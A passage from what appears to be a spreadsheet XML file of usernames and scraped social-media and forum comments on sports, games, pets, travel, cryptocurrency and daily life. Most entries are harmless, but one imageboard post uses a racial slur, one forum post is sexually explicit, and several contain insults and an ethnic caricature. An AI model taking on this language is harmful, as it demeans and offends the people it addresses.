    <t>No you are being downvoted for being the most básico bitch un the universe Hahahaha feench surrender i AM le funny man xdxdxd</t>
  </si>
  <si>
    <t>WoodenBuddy</t>
  </si>
  <si>
    <t>Word.</t>
  </si>
  <si>
    <t>Dark_2277</t>
  </si>
  <si>
    <t>I prefer the first book in the series "The End?"</t>
  </si>
  <si>
    <t>jadenspan</t>
  </si>
  <si>
    <t>Master of Puppets plays like 10 times and it drives me insane, especially after seeing how current the presentation is at an NBA game, NHL's presentation can be so lame.</t>
  </si>
  <si>
    <t>KantoHo</t>
  </si>
  <si>
    <t>This. I found his back throw brutality pretty confusing but I figured it out by holding the opposite directional input from what I thought it would be</t>
  </si>
  <si>
    <t>Pas9816</t>
  </si>
  <si>
    <t>German authority/office, this morning: "We can't help you, you didn't sent us document X, Y and Z." I already sent them via email 4 weeks ago. "It's better when you print them out and give them us here. We will scan them and then we have them digital." Here u go</t>
  </si>
  <si>
    <t>tsaroz</t>
  </si>
  <si>
    <t>The odds says it all. Manchester United has a clear advantage against Chelsea. Though Mourinho has been a controversial coach everywhere, he had an good past experience with Chelsea. Even if he can't rejuvenate this team, no young coaches can. And Chelsea has lost it's most valuable player. It's going to be a sad league for Chelsea fans.</t>
  </si>
  <si>
    <t>Ucla_The_Mok</t>
  </si>
  <si>
    <t>It's the same reason they leave office looking 30 years older.</t>
  </si>
  <si>
    <t>KFCeatingTHOTslayer</t>
  </si>
  <si>
    <t>You have discord</t>
  </si>
  <si>
    <t>Drizzle8888</t>
  </si>
  <si>
    <t>Let me get this straight Karen. So you ordered incorrectly, didn't park legally, and then gave the restaurant(which I was there in june and sat in that line for their chicken) which is famous for being extremely busy a bad review. All because you ordered incorrectly and they didn't allow you to skip the line of the people who had been waiting there for easily a half hour outside and didn't fuck up literally every step involved with getting their chicken. Ya. YTA. I wouldn't apologize to you either. They did nothing wrong. You did literally everything wrong. Hattie B's didn't cost you any more than the chicken did. Your mistakes cost you and you are trying to shift blame onto anyone but yourself. Entitled af fuuu.</t>
  </si>
  <si>
    <t>Zeldador_The_Knight</t>
  </si>
  <si>
    <t>If you were a Genie, what wish would you refuse to grant?</t>
  </si>
  <si>
    <t>formalwear</t>
  </si>
  <si>
    <t>I (Zeke owner) traded Darwin for Pollard 45 minutes ago, someone convince me I’m not dumb.</t>
  </si>
  <si>
    <t>TheJonasCousin</t>
  </si>
  <si>
    <t>HAHAHAHAHAHAHAHAHA So you know what everyone is thinking, got it. You got worked bro, get over it. And that’s now how the karma system operates, so nice try.</t>
  </si>
  <si>
    <t>No bed, but a full size couch. i plan on wearing casual clothes and changing when i land.</t>
  </si>
  <si>
    <t>TouchedOnlyByMom</t>
  </si>
  <si>
    <t>true. i dont try though i still do. i just had a thought that maybe she might be a victim....so i guess im going to fight for her. :)</t>
  </si>
  <si>
    <t>meanwords</t>
  </si>
  <si>
    <t>Quote: from: avikz on Today at 04:36:22 AM Quote: from: Rozita on August 27, 2019, 10:33:11 PM I have heard some stories about making bitcoin transactions illegal. It's all been a humor and I don't think any government have officially made bitcoin transactions illegal. Why is that? Many governments are trying to regulate bitcoin, control exchanges and force people to be authorized. But I am sure government wish bitcoin was not created and there was no trouble of regulating bitcoin. They prefer their fiat to any other currency. Why no government have made bitcoin transactions illegal? I think they want to avoid creating an underground market.They don't want bitcoin to be traded like Alcohol and drugs. They have to accept bitcoin as they cannot stop a decentralized network and now they can only try to regulate it. Do you agree with me? Is there any other things have caused governments to not make bitcoin illegal? Check your facts first! There are many governments in the world that have made the bitcoin transactions officially illegal. Even though they are mostly from 3rd world but some examples are Bangladesh, Egypt, Morocco, Bolivia, Colombia, Ecuador etc. and there are some more countries. Reference: https://en.wikipedia.org/wiki/Legality_of_bitcoin_by_country_or_territory Governments definitely want to curb the illegal usage of cryptos but they also understand that it is impossible to enforce a blanket ban on bitcoin or any other crypto transactions due to its nature of operation. Some developed countries like Japan or Germany have studied the crypto properly and provided a framework to curb the illegal usage and promote legal usage of bitcoin. There are some countries as mentioned above, taken the easier route to ban instead of providing a proper framework. So it is incorrect to say that no countries have made bitcoin illegal, there are examples! Maybe he is talking about the government in the western countries like america? because I'm sure that some countries are avoiding the transaction of crypocurrency. Regarding the issue. There are benefits to using cryptocurrency in the economy and those countries that are utilizing it are reaping it. There's really not much that the government could do though. Even if they illegalized Bitcoin, people would still find a way to use. To that in mind, using it instead of preventing its use is more beneficial to them. It's not like Bitcoin is harmful to people. It just depends on how people use it. Just my thought.</t>
  </si>
  <si>
    <t>roggen-rolla</t>
  </si>
  <si>
    <t>Which way to my hotel room?</t>
  </si>
  <si>
    <t>Qadesh41</t>
  </si>
  <si>
    <t>An extremely comfortable mattress enabling me to get a really good nights sleep.</t>
  </si>
  <si>
    <t>33 weeks and had swollen feet for the first time last night!</t>
  </si>
  <si>
    <t>MrRieper</t>
  </si>
  <si>
    <t>My stepfather.</t>
  </si>
  <si>
    <t>kingofthewilds</t>
  </si>
  <si>
    <t>That wasn't the question. It was what core features are missing. It's 2019 and after 12 iPhone generations, I still can't set Google Maps as my maps app or Spotify as the music app.</t>
  </si>
  <si>
    <t>David Hughes</t>
  </si>
  <si>
    <t>Excerpt: Bought this watch for my wife and she is very pleased with it the watch is very elegant looking and would recommend it to anyone looking for a gift for the woman in their life</t>
  </si>
  <si>
    <t>LegzAkimbo</t>
  </si>
  <si>
    <t>I'm heavily considering either a Sportwagen or an Alltrack, and there's a hefty price jump between the 2017 and 2018 models (around $5k in the trim level I want). Does the new "People's Warranty" (essentially doubling from 3 years to 6) make that price jump worth it?</t>
  </si>
  <si>
    <t>D350L4710N</t>
  </si>
  <si>
    <t>I am not like you other dudes in so much as losing scholarships and girlfriends and shit...I did not even go on a mission. I had a full ride to GED class in county jail and I smoke cigarettes and fuck loose women and do drugs and all kinds of shit goodie goodies barf at and I think I only paid tithing on like five bucks I made mowing lawns in the eighties cause my dad made me do it but I want my tithing back too, church leader cocksuckers. Every fifty fucking cents of it.</t>
  </si>
  <si>
    <t>tunafan6</t>
  </si>
  <si>
    <t>Dude they have PR and all sort of people telling what you can do or not, lol. Probably they gave a green light? I mean if United is angry then there's a reason for it, doubt this was not a common knowledge matter of respecting rules/discipline for Lukaku.</t>
  </si>
  <si>
    <t>Kill_Kayt</t>
  </si>
  <si>
    <t>Smoke detectors don't require install dates. Carbon Monoxide detectors do. This is apparently a combination Smoke/Carbon Monoxide detector. Which is kinda pointless. Smoke detects need to be on the ceiling so that they can detect the first traces of smoke and give ample time to evaluate or handle (because your cooking sucks). If your Carbon Monoxide detector is on the ceiling you will be long dead because it's detected. It's heavier than air. Best play is on a wall below bed/couch level.</t>
  </si>
  <si>
    <t>Ilyccia</t>
  </si>
  <si>
    <t>I HAD A SIMILAR SITUATION, JOINED A NORMAL TITANIA THAT WAS 6 MINUTES IN, FIGURED I WOULD JUST TRY TO HELP, WE FAIL THE BIG ADD PHASE BY A LOT, SO I DECIDE TO USE MNK LB3 TO BARELY GET THE LAST ADD IN TIME BUT DIE TO MECHANICS, HEALERS THEN IGNORE ME FOR THE ULTIMATE WINDUP WHERE THEY HAD AMPLE TIME TO RAISE ME, FINALLY THE SMN PICKS ME UP AND WE CLEAR WITH ME DOING ALMOST 34% MORE DAMAGE THAN THE NEXT HIGHEST PERSON. I LITERALLY PREVENTED A WIPE AND NATURALLY GET NO COMMENDS</t>
  </si>
  <si>
    <t>New users (with less than 50 karma) cannot post. Feel free to lurk and comment. *I am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](/message/compose/?to=/r/juul) if you have any questions or concerns.*</t>
  </si>
  <si>
    <t>separeaude</t>
  </si>
  <si>
    <t>The shots would be terrifyingly amplified and the echos would make it very hard to figure out where the shooter was.</t>
  </si>
  <si>
    <t>Wyatt44</t>
  </si>
  <si>
    <t>Alison Wonderland - I Want U [https://www.youtube.com/watch?v=YLCm9lP-3Uk](https://www.youtube.com/watch?v=YLCm9lP-3Uk)</t>
  </si>
  <si>
    <t>27th_wonder</t>
  </si>
  <si>
    <t>Are white scars allowed to use Bikes as troops? Because that would be a significant advantage to any Primaris Bike release if it were troop choice for WS.</t>
  </si>
  <si>
    <t>Stecco_</t>
  </si>
  <si>
    <t>As a schoolar research i am building a small database storage system but i lack the knowledge about what is behind the DB storage system, in other words how data is stored in the filesystem? Which is the best way to store data? Do i need to save data in the filesystem in a specific format to make the reading of it quicker? In this question it's allowed to talk about both SQL like and NoSQL like databases but not In-memory databases.</t>
  </si>
  <si>
    <t>whythisguy0218</t>
  </si>
  <si>
    <t>We dont ammend rights to give them away</t>
  </si>
  <si>
    <t>UKUKRO</t>
  </si>
  <si>
    <t>Inb4 the russkies get here: "CIA PLOT TO UNDERMINE POOR POOR RUSSIYA", "WOULDN'T BE ALIVE IF POISEN WAS STRONK RUSSIYAN", "HE IS NAZI JEW WHO POISON HIMSELF BECAUSE NWO LIZARD PEOPLE TOLD SO" ect...</t>
  </si>
  <si>
    <t>TrueKara</t>
  </si>
  <si>
    <t>**Does not.** ([https://66.media.tumblr.com/f33a2d5d283e7e06588552de8f14036c/tumblr\_inline\_o5whii56Ph1thjzma\_1280.png](https://66.media.tumblr.com/f33a2d5d283e7e06588552de8f14036c/tumblr_inline_o5whii56Ph1thjzma_1280.png))</t>
  </si>
  <si>
    <t>thewholedamnplanet</t>
  </si>
  <si>
    <t>Donald Trump Is an Arsonist Pretending to Be a Fireman - The Bulwark - Imitating public service is a specialty of his</t>
  </si>
  <si>
    <t>&gt;&gt;21234337 The nigger is actually pretty good at it too. Hope he doesn't crash. Only gear he wears is a helmet and gloves.</t>
  </si>
  <si>
    <t>WildJoeBailey</t>
  </si>
  <si>
    <t>I’m visiting the US from another country and need to set up Uber on my phone. When setting up, the app asks for a phone number. The mobile phone number I use in my home country is different to the one that I will be using in the US. Should I wait until I arrive in the airport before setting up Uber using my US mobile phone number?</t>
  </si>
  <si>
    <t>Rustey_Shackleford</t>
  </si>
  <si>
    <t>Cats don't abide by the laws of nature.</t>
  </si>
  <si>
    <t>&gt;&gt;262461291 &gt;t. woke brainrot Anon, incels are the opposite. Why do you think there are so many weeb games with female characters?</t>
  </si>
  <si>
    <t>libcomcatgirl</t>
  </si>
  <si>
    <t>Make sure to see a doctor if your ""justice"" boner lasts for more than four hours.</t>
  </si>
  <si>
    <t>Boudicat</t>
  </si>
  <si>
    <t>I believe the religious elements of the pledge of allegiance were added around the same time.</t>
  </si>
  <si>
    <t>life-is-pass-fail</t>
  </si>
  <si>
    <t>Where does it say that?</t>
  </si>
  <si>
    <t>hazmatt_05</t>
  </si>
  <si>
    <t>What is so good about it? I went to Tokyo during Halloween but don’t remember it, but I will be going to California in the next few weeks.</t>
  </si>
  <si>
    <t>Pigsblanket101</t>
  </si>
  <si>
    <t>To preface this, I live in America so this is all based on life here. From the moment you’re born till even after death, there’s always something to drag you down. There’s always something or someone who wants to see you fail. Wants to own a piece of you, to control you, to manipulate you. You’re born. Now you get to live this hell we call life. You’re born and your family now instantly owe thousands upon thousands of dollars. The gift of life brings financial burden onto your family. Think about that. You want to have a baby. You want to start to start a family. You want to do the one natural thing every living species on earth wants to do, which is have offspring. But guess what, you better have $10,000 and great insurance or else fuck you and your dreams and desires for happiness in child birth because if you do have a baby you’re gonna be in medical debt for years to come. Because here in America happiness and basic human functions (childbirth) aren’t free. Childhood. Maybe you were lucky and born into a nice family who was able to afford your birth and even buy you some nice toys and clothes. Maybe you were born into a really bad family with a history of abuse. Maybe your parents don’t want you? Such a sad situation that a child can not control. Even if you were abused and you are taken away by child protection services, you get placed into the foster system which in America is beyond fucked up. Household to household or organization to organization, you’re handed around like the hand-me-down dress that your great grandma made for your grandma that nobody wants. Oh you found a nice family who wants to adopt you? Oh that’s wonderful! I hope they have $50,000 and a years worth of time. Yep to adopt a poor helpless child whose known nothing but sadness you literally need to be rich. But yet there’s thousands upon thousands of families who would love to open their homes except they can’t because of the ridiculous adoption process. School. Let’s say you were born into a nice family who loves you. That’s wonderful. Now is when 16 years of bullshit begins. The school system in America is atrocious. From the moment you walk into kindergarten to the time you walk down the isle to your high school graduation, you’re just a walking test score the school grooms for their own profit. From the very first day, they cram test taking down your throat. Schools don’t teach you to learn material. They don’t challenge you to better yourself. They teach you how to score well on state mandated exams so they look good enough to get funding. This isn’t necessarily the schools fault, they have to do this. A school with bad average test scores won’t get as much funding as the school with nationwide credibility. Which sucks because the school with bad test scores needs help. They need money to help better the students. But no, that’s not how it works. The state wants to keep pampering their favorite child and leave everyone else to fend for themselves. Life is a lottery that we all lose to some extent. Every day we fill our lives with false meaning and hope just to live a prefabricated life built by the governing powers above us just so they can profit in our misfortunes</t>
  </si>
  <si>
    <t>zyocuh</t>
  </si>
  <si>
    <t>A lot of the time people will make up names for a set up. Calling something like vampire Hunter ivara or demon Hunter harrow. So it isn't always obvious especially since the wings don't actually exist in the game.</t>
  </si>
  <si>
    <t>Prison_Mike118</t>
  </si>
  <si>
    <t>oof sounds tough dude, but best of luck to you. I hope everything works out!</t>
  </si>
  <si>
    <t>Leather_Titch</t>
  </si>
  <si>
    <t>I'm not obssesed with them, but I sure like them a lot, I've been years together with my daddy and we enjoy our relationship, one of our lifegoals to continue together as much as we can. The only thing I don't do is call him 'daddy' or things like that, it's just something I don't feel doing.</t>
  </si>
  <si>
    <t>IrishinManhattan617</t>
  </si>
  <si>
    <t>That's misleading. You need to distinguish between homeless families and homeless single adults. They are two entirely different subgroups. I think a lot of people have great sympathy and want to help the homeless families were bad circumstances and/or lack of resources is the cause.</t>
  </si>
  <si>
    <t>DmanInCali00007</t>
  </si>
  <si>
    <t>I agree. I obviously don't know him, but I think we can safely say money wouldn't be the main factor for any professional moves he would make. I also don't see him moving out of Miami for work. Moving is something we rarely discuss on here, but he's avoided moving so far, why would he want to pack up and leave the 305?He's also about to get married and possibly planning some mini Gravy Vampires. He's what? 50 yo? He's not moving for a gig.</t>
  </si>
  <si>
    <t>Herman Robers</t>
  </si>
  <si>
    <t>Configure your authentication source to query the Global Catalog server, then it can get information for any user with a single query. Check this post for more information . -- If you have urgent issues, please contact your Aruba partner or Aruba TAC (click for contact details) .</t>
  </si>
  <si>
    <t>akamop</t>
  </si>
  <si>
    <t>Go to a plumbing supply house and befriend an old plumber. You may end up doing all the work in your house yourself but he will give you all the direction and tricks of the trade you can handle. Not to mention he has all the tools.</t>
  </si>
  <si>
    <t>Nemesys2005</t>
  </si>
  <si>
    <t>That’s the. I test example of clumsy thumbs I’ve ever seen.</t>
  </si>
  <si>
    <t>@Helen so many of us Hardworking Helens! This one has cleaned the listing and ironed the bedlinen and now off for a pedicure! I loathe ironing fitted sheets, I iron them on the bed.</t>
  </si>
  <si>
    <t>SuckMyselfOff69</t>
  </si>
  <si>
    <t>diver6 said: ↑ I do love the aroma of an excited wet pussy, I love to play with the wife’s clit and can tell she’s getting excited just by the aroma from under the sheets! Also if I don’t shower after fucking her I can smell her pussy juices on my cock the whole next day! Makes me so horny again from it! Click to expand... The smell of a wet pussy drives me wild. If I don’t shower after sex, and catch the smell of her juices on my cock it makes me so hard. I can’t help but stroking it, but in an edging method to keep the smell going. Love it!</t>
  </si>
  <si>
    <t>mediummeech</t>
  </si>
  <si>
    <t>Yea bro, I don't know what the fuck you're talking about lol</t>
  </si>
  <si>
    <t>Joaniepoanie</t>
  </si>
  <si>
    <t>Thanks Delilah....that was fun. If anyone is ever in Detroit don’t miss Hitsville. You actually get to stand in the recording studio where all that great music was made.</t>
  </si>
  <si>
    <t>Neutral_3vil</t>
  </si>
  <si>
    <t>5 is a very solid number. I think that you'll find between the 4 other players that they will balance themselves out in a way. Once someone says "I wanna be a Barbarian!" No one else will likely pick it. New players in my experience have been, well, overly gracious one could say. So the first things to consider are what classes can do the most jobs. I'll try and give you my picks for this, but since the party is of a decent size, let's focus on why you SHOULDN'T pick any one of these in a given composition rather than why you should. Moon Druid is the biggest winner. They have utility spells, can tank, heal, have decent skills, and can control the battlefield like nothing else. Their only downside is a slight lack of DPS potential. So I'd say this is a solid pick if there are 1 or 2 really great DPS characters in the mix. Any kind of Paladin is also great at filling multiple roles. They can Tank, DPS, be the party face and heal, though you probably don't want them as the only character with healing potential, so avoid that scenario. The Rogue is pretty a great character for an experienced player to guide new ones. Especially the Mastermind, since it enables the newbies and let's them soak up some glory. Don't use this if the party is too squishy though. Lore Bards are kind of the Kings of skills. If you focus their spell selection around utility and "usefulness" they can fit into any party. However, if the party already has a nice wide selection of skills, (especially charisma based ones) avoid this one so that everyone can get a chance to shine. Warlocks in general are nice because they are so incredibly customizable. Even In a party of this size you could all be Warlocks and play entirely differently. So if you focus your spell and invocation selection on what the party needs you're golden. Celestial, Old One's, and Hexblade are the biggest winners for that. But I'd personally avoid this if the party is already pretty well balanced without you, since doing this can leave you feeling a bit underpowered. Hopefully these five recommendations should be enough.</t>
  </si>
  <si>
    <t>incrediblyJUICY</t>
  </si>
  <si>
    <t>I’ve had multiple negative experiences in gyms and I don’t even have body issues. 1. I was working out with my friend and there was a guy facing away from us as we were talking behind him. This guy my friend knew and told me later he was roided out. As I turned to leave the machine and was walking away he said something like “why the fuck are you staring at me” despite no one looking at him, we were just using the machine behind him. Luckily we were already walking away so he just looked kind of stupid. 2. I had another dude try to intimidate me saying “This is my gym” to me twice, but it was in a low voice so I didn’t hear him at first and after I asked him what he said he went back to talking to the dude he was talking to and didn’t address me. So people’s fears of going to the gym aren’t based on nothing, you get a lot of arrogant assholes in there. Probably go to planet fitness or somewhere where it’s other out of shape people. If you go to the wrong place there’s a lot of roided out assholes.</t>
  </si>
  <si>
    <t>JusticeHasFallen</t>
  </si>
  <si>
    <t>I have a 21 year old son who is a full time college student. I am a 100% disabled veteran, so he had a dependent ID card on my account. We use it for his educational benefits (Chapter 35 and the Texas Hazelwood Act). My husband (his father) is retired Air Force. Our son has a dependent ID on his dad's account for his medical benefits. He has had two dependent ID cards issued twice. As a matter of fact, they were both issued this morning. We came back to get new ID cards that expire a year from now, as opposed to December, because we got a letter from his college with more complete information on it. They confiscated his ID card on my account and said he can't have 2 dependent ID cards. I told them one is for educational benefits and one is for medical benefits, but she took it anyways. I can't find any information on this topic. Can anyone help?</t>
  </si>
  <si>
    <t>Frungy</t>
  </si>
  <si>
    <t>50,0000 yuan for an absolutely arbitrarily chosen currency my ol’ 朋友.</t>
  </si>
  <si>
    <t>MattySolo</t>
  </si>
  <si>
    <t>[http://cookingupcash.com/mixing-cereal-a-serial-mixer/](http://cookingupcash.com/mixing-cereal-a-serial-mixer/)</t>
  </si>
  <si>
    <t>unseenspecter</t>
  </si>
  <si>
    <t>&gt; if i'm a jungler and I insec someone towards my laner that they're going to attack You have so much faith...</t>
  </si>
  <si>
    <t>shubik23</t>
  </si>
  <si>
    <t>Came here to say this. I would say the experiment of OP is exactly like Plato’s allegory of the cave</t>
  </si>
  <si>
    <t>IAmSubhumanMale</t>
  </si>
  <si>
    <t>Replacement for The Last Naruto?</t>
  </si>
  <si>
    <t>Cleverish_Name</t>
  </si>
  <si>
    <t>Yes. That is the joke.</t>
  </si>
  <si>
    <t>ryanocallaghan01</t>
  </si>
  <si>
    <t>To anyone who owns/ knows about the on-board audio setup on the Aorus X570 Master, does it have the capability to amplify front panel headphones simultaneously to rear panel devices? Such feature is on the dual codec AX370-Gaming 5 I currently run and it is a cool little feature I would not like to lose, in which case I'd probably just move down to the Ultra and spend the ??100 I save on some dedicated sound hardware.? Thanks in advance.?</t>
  </si>
  <si>
    <t>hm_elec</t>
  </si>
  <si>
    <t>Ah, phone peasant, I see</t>
  </si>
  <si>
    <t>Mother87</t>
  </si>
  <si>
    <t>Flippedoff - think I've done it!🎉</t>
  </si>
  <si>
    <t>nicktanisok</t>
  </si>
  <si>
    <t>Yo I never tot I could feel more mood on top of mood. Totally on a old hip hop rmb spree now, loading up a playlist so I can feel like I'm in sec school again. Cheers and thanks for making my hump day more bearable</t>
  </si>
  <si>
    <t>Dr_Disaster</t>
  </si>
  <si>
    <t>Amy Pascal was just smart enough to know when she was beat. Tom Rothman's stupidity knows no bounds. He damn near killed the X-Men franchise and now he's trying to do it to Spider-Man.</t>
  </si>
  <si>
    <t>YK-11</t>
  </si>
  <si>
    <t>I'm laughing so hard right now!</t>
  </si>
  <si>
    <t>gameandyoufriends</t>
  </si>
  <si>
    <t>To Write A Story</t>
  </si>
  <si>
    <t>LHITN</t>
  </si>
  <si>
    <t>Just to note: I've done the same course at a different college - you don't *actually* get a CCNA qualification, just some of the knowledge to take the exam (Although the certificates you get mention CCNA so it's good to put on your CV)</t>
  </si>
  <si>
    <t>screenmagnet</t>
  </si>
  <si>
    <t>A few clarifying questions! 1. What do mean by “hits all the three point shots”? 2. I’m assuming your math is based on a SAHM scenario? How does it change if she continues to earn an income after kids are in the picture and/or she brings wealth into the marriage? 3. What about a marriage or LTR without any kids (let’s say neither partner wants them or let’s say the man has grown kids with his ex-wife but his new girl doesn’t want any kids of her own)? 4. Is a “pleasing orientation” the same thing as a “positive attitude” or is it different? Can a woman lack “discontent” but still be a bitch? 5. Are bitches always dominant in their relationships? Or can a woman simultaneously be submissive and a bitch to her husband? Such as a nurturing traditional 50s style housewife who takes care of her husband but does so with a bitchy attitude?</t>
  </si>
  <si>
    <t>FuckEthan</t>
  </si>
  <si>
    <t>The fuck ghost town is straight up one of the best Kanye songs period.</t>
  </si>
  <si>
    <t>Welcome to r/EmojiPasta, Join our Discord here: https://discord.gg/56zaXAU *I am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](/message/compose/?to=/r/emojipasta) if you have any questions or concerns.*</t>
  </si>
  <si>
    <t>We have a TL10 Tracmotive Tractor Serial # 949 Lookiing for the firing order. Sometimes things that you think will be really complicated end up being easy to fix. The Heavy Equipment Mechanic I'm going to connect you with knows all the tricks and shortcuts. We have spark, we have gas, it turns over but will ntot start Are you fixing this yourself? What have you tried so far? Check for Spark, gas and it does turn over but cannot get it to start. Mag needle was rebuilt but do not know if they have it set right Anything else you want the agriculture mechanic to know before I connect you? No I think I covered everything</t>
  </si>
  <si>
    <t>Cap10Haddock</t>
  </si>
  <si>
    <t>Your sofa gets itches?</t>
  </si>
  <si>
    <t>Clown_Shoe</t>
  </si>
  <si>
    <t>Carried the franchise implies we had success with him here. We were average to below average outside of one year of him being here.</t>
  </si>
  <si>
    <t>cheryldumais</t>
  </si>
  <si>
    <t>You are doing exactly what you need to! Congrats. Take your time. I'm old and fairly sedentary so I only get 1350 - 1400 for maintenance! What I do is try to move more to get extra calories. If I walk a couple hours I get another couple hundred or so. My biggest regret is that I didn't lift weights while I was losing to maintain muscle mass so you might think about slowly adding some weight bearing exercise so you don't end up like me. Be sure you get enough protein as well to preserve the muscle you have. August 28, 2019 1:09PM</t>
  </si>
  <si>
    <t>They didn’t buff building because of planes, no matter what if they went through they went through. Turbo building was changed to 0.05 in 4.2, season 4.</t>
  </si>
  <si>
    <t>Breckmoney</t>
  </si>
  <si>
    <t>There’s no in-game reason that should prevent you from using shapeshift every fight. I don’t know what else it’d be but some kind of bug I guess. I don’t think I’ve ever had that happen. I wonder if you went back to the inn and respec if that might reset whatever is wrong.</t>
  </si>
  <si>
    <t>Cold Smoke</t>
  </si>
  <si>
    <t>PSUSignore said: ↑ I think this was posted a few days ago. FYI, they measure "blue chip ratio" as the % of the roster comprised of 4 and 5 star recruits. Since they began tracking this, which they started in 2005-ish, every single national champion has had a blue chip ratio of at least 50%. They have continued to follow it to see if that statistic will be broken. If you subscribe to this theory that you need a 50%+ ratio to compete for a title, each year there are only about a dozen schools in contention. PSU went over 50% for the first time in 2016 as you see in the graph, and has only increased from there. Click to expand... 2018 Still, I like the trend you point out.</t>
  </si>
  <si>
    <t>&gt;&gt;808310158 She doesn't look happy...post more</t>
  </si>
  <si>
    <t>hog_slayer</t>
  </si>
  <si>
    <t>My aunt beat her in 1981 at the Worlds in Little Rock.</t>
  </si>
  <si>
    <t>carl73833</t>
  </si>
  <si>
    <t>Tim Duncan and I don't even think twice about it</t>
  </si>
  <si>
    <t>geophagus</t>
  </si>
  <si>
    <t>I'll give you credit. You packed a tremendous amount of woo into a fairly short post. &gt;This phenomenon known as emergence can be seen on all levels of life. Can this be demonstrated to happen? If so, what is the medium by which this operates/propagates/whatever?</t>
  </si>
  <si>
    <t>albinobluesheep</t>
  </si>
  <si>
    <t>&gt;Breaking: [@DSchratwieser](https://twitter.com/DSchratwieser) reporting a total of SIX officers have been shot, but NONE have life-threatening injuries Good-ish news. up to 6, but none life threatening.</t>
  </si>
  <si>
    <t>alganthe</t>
  </si>
  <si>
    <t>whenever I get deodorizers, you only need the exosuits when you reach the oil biome.</t>
  </si>
  <si>
    <t>cmykstrings</t>
  </si>
  <si>
    <t>My mom is a single forever lady in her 60s who lives with her cat and her bitterness. She hasn't had a partner in like 30 years or so. She wears a wedding ring with a big fat diamond she upgrades every decade or so to ensure strangers believe she is someone rich who is married and well off. It's a lie. Rings are to you what you want them to be. My spouse and I have been legally married for 21 years and both haven't worn rings for over 10 years. My mom however who isn't married wears an engagement ring and a band set at all times. If an unmarried couple wants to wear rings to signal their commitment? Awesome! If a married couple wants to not wear rings because they hate wearing jewelry? Also awesome! If a spinstress wants to wear a ring to trick people? Awesome, whatever, who cares. Live your life. Your relationship can have rings or not rings, you decide.</t>
  </si>
  <si>
    <t>urmumqueefing</t>
  </si>
  <si>
    <t>That tweet might not go so well for us...</t>
  </si>
  <si>
    <t>dcorey688</t>
  </si>
  <si>
    <t>think he meant color of mags. 10xfde 10x black 10x odg 10x of that weird white teal purple pattern that used to be on cups in the 90s etc...</t>
  </si>
  <si>
    <t>YeetMyMeatSuccMyKeet</t>
  </si>
  <si>
    <t>Make sure to sound like guy. That's what I think should be first priority to infiltrate society of gentlemen.</t>
  </si>
  <si>
    <t>Justin_0rbit</t>
  </si>
  <si>
    <t>Yeah it's normal. You'll get used to it after a while and then it will be the next kind of store. First you get comfortable going to the corner stores, then full grocery shopping, then to the pharmacy to pick up prescriptions, then to the doctor, etc. I got my first tattoo about a month ago, and it's the same feeling. The bright side is the anxiety period (normally) gets much shorter.</t>
  </si>
  <si>
    <t>ForestWeenie</t>
  </si>
  <si>
    <t>Aww, she’s adorable! In other news, are those sushi shoelaces?!</t>
  </si>
  <si>
    <t>Nicolekinna</t>
  </si>
  <si>
    <t>My 5 year old dog was diagnosed with t-cell skin lymphoma. His liver count was over 2,000 (the higher end is usually 150) when we took him to the vet last week. We went to discuss quality of life. He is still playing but when he runs his toenails break and bleed. He is still eating but is taking a steroid which would increase his appetite . He has diarrhea but I think that might be from the people food he is getting more often now. He is getting skinny but his abdomen looks enlarged. His breathing is a little weird, he shakes when he breaths and it’s a little uneven. I’m totally heartbroken. My husband doesn’t want him to suffer at all and doesn’t want to wait until he stops eating and playing like the vet suggests. I don’t want to rob him of his days but can see where he is coming from. Do you think it’s time to put him down? How do we know?</t>
  </si>
  <si>
    <t>gaMEgRenE</t>
  </si>
  <si>
    <t>I haven’t seen this level of special in a minute</t>
  </si>
  <si>
    <t>Insolent_villager</t>
  </si>
  <si>
    <t>Both...</t>
  </si>
  <si>
    <t>Frosty_Grape</t>
  </si>
  <si>
    <t>that's 1 room apartment money.</t>
  </si>
  <si>
    <t>NotMyHersheyBar</t>
  </si>
  <si>
    <t>You want industry movies. Sunset Blvd All About Eve Straight-Jacket (2004, NOT the 60s Joan Crawford) The Player (late-80s) Postcards from the Edge (80s) Singin in the Rain Here's a list: [https://www.indiewire.com/2016/02/22-essential-films-about-hollywood-272592/](https://www.indiewire.com/2016/02/22-essential-films-about-hollywood-272592/) tv: Hollywood Babylon (unsolved mysteries-style show about classic hollywood mysteries and crime) American Horror Story Hotel Grosse Pointe (90s satire of making a Dawsons Creek/90210 type show)</t>
  </si>
  <si>
    <t>aegisontoast</t>
  </si>
  <si>
    <t>I lost most of Whiterun to vampire attacks, but it was worth it considering Nazeem died in the process.</t>
  </si>
  <si>
    <t>Greetings, all! This is a sub for professional veterinary advice, and as such we follow strict rules for participating. OP, your post **has NOT** been removed. This is an *automated* general reminder to **please follow [The Sub Rules](https://www.reddit.com/r/AskVet/about/rules/)** when discussing this question: - **Do not comment with anecdotes** about your own or others' pets. - **Do not give OP specific treatment instructions,** including instructions on meds and dosages. - **Do not give possible diagnoses** that could explain the symptoms described by OP. **Your comment will be removed, and you may be banned.** Thank you for your cooperation! *I am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](/message/compose/?to=/r/AskVet) if you have any questions or concerns.*</t>
  </si>
  <si>
    <t>BrautanGud</t>
  </si>
  <si>
    <t>&gt;One of the reasons why I'm an atheist... your moral responsibility cannot rely on something external. Hence my username "Brautangud." Swedish translation: "Good without god."</t>
  </si>
  <si>
    <t>ClaudiaBalint</t>
  </si>
  <si>
    <t>There's def a line. Congrats! Do the blood test, that will confirm it</t>
  </si>
  <si>
    <t>retired-memes</t>
  </si>
  <si>
    <t>Use to do applicant interviews for a large gaming community (if that counts), run my a popular YouTuber. By far the weirdest was when one guy, after I wnet through the initial formalities I had to cover, said: "Have you guys ever played with {YTers name}? *heavy breathing*, I'm really looking forward to playing with him *more heavy breathing*". You'd have to be there to appreciate the creepiness and hilarity of the situation, but yes, defiantly the strangest.</t>
  </si>
  <si>
    <t>Joeman783</t>
  </si>
  <si>
